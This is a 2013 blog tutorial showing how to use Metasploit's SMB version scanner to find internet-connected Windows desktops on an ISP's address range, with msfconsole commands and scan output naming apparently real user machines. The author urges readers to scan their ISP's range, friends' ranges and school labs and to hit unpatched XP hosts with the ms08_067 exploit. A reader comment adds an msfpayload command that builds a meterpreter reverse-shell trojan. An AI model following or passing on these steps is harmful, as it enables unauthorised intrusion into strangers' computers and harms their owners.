Find online windows machines using metasploit

By | April 17, 2013

In this post I am going to show you, how to discover windows machines online. These windows machines are desktop users connected to the internet. Many windows versions are known to have vulnerabilities that can be exploited with metasploit by just using the ip address of the system. So the first step would be to find out such machines if any.

SMB version scanner

Metasploit has an auxiliary scanner module for scanning the samba service version on a range of ip addresses. The samba service runs on port number 445. The exact path to the scanner inside msfconsole is auxiliary/scanner/smb/smb_version .

The first step would be to set the target ip addresses to scan for. The best way to find a range of ip addresses to scan is your own ip address range. Just like you are connected to the internet through your isp, lots of other users are connected too. Lets say I find out my public ip address to be then I can choose a range of
That range will scan 255 ip addresses in all.

Lets try this with metasploit. Start msfconsole. I am using backtrack so the output might look different from your console if its windows or something else.

msf > use auxiliary/scanner/smb/smb_version 
msf  auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

First select the smb version scanner, then display the options it needs to scan. In the options the only one necessary is the RHOSTS which is the ip range to scan. so we set it to the ip address range we chose above.

msf  auxiliary(smb_version) > set RHOSTS

We also set a higher value for the THREADS like 10 so that it can scan faster.

msf  auxiliary(smb_version) > set THREADS 10

All options are set, now enter run and hit enter. It would start showing online windows machines with the version number, build etc.

msf  auxiliary(smb_version) > run

[*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:MANISH-PC) (domain:WORKGROUP)
[*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:RAJESH-PC) (domain:WORKGROUP)
[*] is running Windows 7 Home Premium (Build 7601) (language: Unknown) (name:MININT-VCRO6TK) (domain:WORKGROUP)

If you are lucky enough to find an unpatched windows xp sp2( or lesser) machine then you might be able to launch the famous ms08_067_netapi exploit and gain control of the system using meterpreter or vnc. That is going to be real fun until you are caught! If you are running out of hacking ideas, then let me tell you that you can try this on your isps ip range, your friend's isp's ip range, your school computer lab and so on.

Note that these are those machines that are directly connected to the internet, because metasploit could access the port number 445 and extract information out. If a machine is connected via an internet router then it wont show up here, since the router would be the device online in that case.

So we saw how the auxiliary modules lend metasploit the power to scan as well apart from exploitation. There are many other useful scanners that we are going to talk about in upcoming posts.

Last Updated On : 17th April 2013

One thought on “Find online windows machines using metasploit

  1. BEN

    message d erreure creations payload trojan

    msf > msfpayload windows/meterpreter/reverse_tcp LHOST= X >
    [*] exec: msfpayload windows/meterpreter/reverse_tcp LHOST=
    X > /home/ben/ExploitMeta.exe

    `block in replace_bin_path’: can’t find executable msfpayload
    from /var/lib/gems/2.1.0/bin/msfpayload:23:in `’

Leave a Reply

Your email address will not be published. Required fields are marked *